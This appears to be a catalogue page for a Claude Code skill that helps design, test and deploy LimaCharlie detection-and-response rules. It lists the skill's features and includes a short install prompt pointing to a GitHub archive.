detection-engineering
OfficialAI-assisted D&R rule design and testing.
System Documentation
What problem does it solve?
This Skill acts as an expert Detection Engineer to help create, test, and deploy D&R rules in LimaCharlie. It guides through threat understanding, data research (Schema, LCQL, Timeline), detection logic generation, rule testing against sample and historical data, and deployment of validated rules. Use it for building detections, writing D&R rules, testing logic, or when you want to detect specific behaviors or threats.
Core Features & Use Cases
- AI-generated detection rules and response logic for LimaCharlie
- Guided research of event schemas, LCQL queries, and timeline data
- Iterative testing against sample and historic data with validation steps
- Safe deployment with user approvals and documentation
Quick Start
Example: Generate a detector for encoded PowerShell in last 24h, test against sample events, then deploy.
Dependency Matrix
Required Modules
None requiredComponents
Standard package💻 Claude Code Installation
Recommended: Let Claude install automatically. Simply copy and paste the text below to Claude Code.
Please help me install this Skill: Name: detection-engineering Download link: https://github.com/refractionPOINT/lc-ai/archive/main.zip#detection-engineering Please download this .zip file, extract it, and install it in the .claude/skills/ directory.
Agent Skills Search Helper
Install a tiny helper to your Agent, search and equip skill from 471,000+ vetted skills library on demand.